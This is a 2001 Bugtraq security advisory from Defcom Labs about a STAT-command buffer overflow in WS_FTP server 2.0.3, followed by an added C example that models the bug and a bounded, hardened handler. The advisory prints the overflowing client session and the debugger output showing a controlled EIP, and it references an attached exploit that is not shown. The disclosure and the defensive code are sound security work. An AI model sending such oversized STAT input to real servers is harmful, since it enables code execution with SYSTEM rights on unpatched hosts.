From andreas.junestam@defcom.com Mon Nov 5 11:10:57 2001
From: andreas junestam
To: bugtraq
Date: Mon, 05 Nov 2001 10:09:00 +0100
Subject: def-2001-31

======================================================================
                 Defcom Labs Advisory def-2001-31

               WS_FTP server 2.0.3 Buffer Overflow

Author: Andreas Junestam
Co-Author: Janne Sarendal
Release Date: 2001-10-05
======================================================================

------------------------=[Brief Description]=-------------------------

WS_FTP server 2.0.3 contains a buffer overflow in the handling of the
STAT command. Because the server runs as a service by default, the
overflow lets an attacker run code on the target with SYSTEM rights.

------------------------=[Affected Systems]=--------------------------

- WS_FTP server 2.0.3 and possibly earlier versions

----------------------=[Detailed Description]=------------------------

* Command Buffer Overrun

The parsing code for the STAT command suffers from a buffer overflow.
Sending a STAT command with an argument longer than 479 bytes (475
bytes of padding + a 4-byte new return address) overflows a buffer and
overwrites EIP. The exact length needed depends on the length of the
server's name, because the argument, the server name and some further
information are wsprintf'ed together into the same fixed-size buffer:
a longer server name leaves less room for the argument.

A proof-of-concept exploit is attached to the advisory.

Client side:

C:\tools\web>nc localhost 21
220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
220-Wed Aug 08 19:57:40 2001
220-30 days remaining on evaluation.
220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
user ftp
331 Password required
pass ftp
230 user logged in
stat AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Server side (service log, followed by the debugger output):

0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
SetFolder = C:\program\iFtpSvc\helig
SetFolder = C:\program\iFtpSvc\helig\public
SetFolder = C:/program/iFtpSvc/helig
0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success (A1)

Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002 esi=0067c280 edi=00130178
eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
41414141 ?? ???

Both the saved frame pointer (ebp) and the return address (eip) have
been replaced by the 0x41 ('A') padding, so the attacker controls
where execution resumes when the STAT handler returns.

---------------------------=[Workaround]=-----------------------------

Download the new version (2.0.4) from:
http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html

-----------------------------=[Exploit]=------------------------------

See attached file, ws_ftp2.pl

-------------------------=[Vendor Response]=--------------------------

This issue was brought to the vendor's attention on the 8th of August,
2001. A patch has been released.

======================================================================
This release was brought to you by Defcom Labs
labs@defcom.com
http://labs.defcom.com
======================================================================

[Part 2, Application/X-PERL 3.3KB]
[Unable to print this part]
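The following is an added example, not code from the advisory, from Defcom Labs or from Ipswitch. It models the bug class the Detailed Description names: an unbounded wsprintf-style call that formats the server name, the client's STAT argument and some fixed text into one fixed-size stack buffer, so the argument length that overflows it shrinks as the server name grows. The buffer size (512), the reply format string and the use of sprintf/snprintf in place of wsprintf are assumptions for illustration; nothing here reproduces the real WS_FTP layout or the attached ws_ftp2.pl. The vulnerable pattern is shown as a length oracle rather than an actual stack smash, next to a hardened handler that rejects over-long arguments before formatting.

```c
/* Added example: model of an unbounded-format STAT handler and its fix.
 * All sizes and strings below are assumptions, not WS_FTP's real values. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define STAT_BUF 512   /* assumed size of the fixed stack buffer */

/* Assumed reply layout: "<server> status: <argument>\r\n".  The server name
 * and the fixed text share the buffer with the client's argument, which is
 * why the overflowing argument length depends on the server name. */
static const char *STAT_FMT = "%s status: %s\r\n";

/* Number of bytes an unbounded wsprintf/sprintf would write (excluding NUL). */
size_t stat_reply_len(const char *server, const char *arg)
{
    int n = snprintf(NULL, 0, STAT_FMT, server, arg);
    return n < 0 ? 0 : (size_t)n;
}

/* Vulnerable pattern, expressed as an oracle: sprintf(buf, STAT_FMT, ...)
 * into a STAT_BUF-byte buffer writes past its end iff this returns 1. */
int stat_would_overflow(const char *server, const char *arg)
{
    return stat_reply_len(server, arg) + 1 > STAT_BUF;   /* +1 for the NUL */
}

/* Longest argument that still fits.  One byte more overwrites whatever
 * follows the buffer on the stack (saved EBP, return address, ...). */
size_t stat_max_arg_len(const char *server)
{
    size_t fixed = stat_reply_len(server, "");
    return fixed + 1 > STAT_BUF ? 0 : STAT_BUF - 1 - fixed;
}

/* Hardened pattern: check the full formatted length against the buffer
 * before formatting, and use a bounded formatter so a miscount can only
 * truncate.  Returns bytes written, or -1 if the argument must be refused
 * (the caller would answer with a 501 and log the client address). */
int handle_stat_safe(char *out, size_t outsz, const char *server, const char *arg)
{
    if (stat_reply_len(server, arg) + 1 > outsz)
        return -1;
    int n = snprintf(out, outsz, STAT_FMT, server, arg);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

int main(void)
{
    /* Constructed input: a STAT argument of 599 'A's, as in the advisory's
     * crash session (the real trigger length is 479 for their server). */
    char arg[600];
    memset(arg, 'A', sizeof arg - 1);
    arg[sizeof arg - 1] = '\0';
    char out[STAT_BUF];

    printf("max safe arg for \"helig\":       %zu\n", stat_max_arg_len("helig"));
    printf("max safe arg for \"ftp.example\": %zu\n", stat_max_arg_len("ftp.example"));
    printf("599 x 'A' overflows the buffer:  %d\n", stat_would_overflow("helig", arg));
    printf("hardened handler result:         %d\n",
           handle_stat_safe(out, sizeof out, "helig", arg));
    return 0;
}
```

The point of `stat_max_arg_len` is the advisory's observation that the trigger length moves with the server name: here a 5-character name ("helig", as in the crash log) allows a longer argument than an 11-character one, and any argument beyond that limit is exactly the overflow condition. When hunting the same bug class, every sprintf/wsprintf/strcat into a fixed buffer whose inputs include client-controlled data is a candidate, and the fix is the same as `handle_stat_safe`: measure first, refuse or truncate, then format with a bounded call.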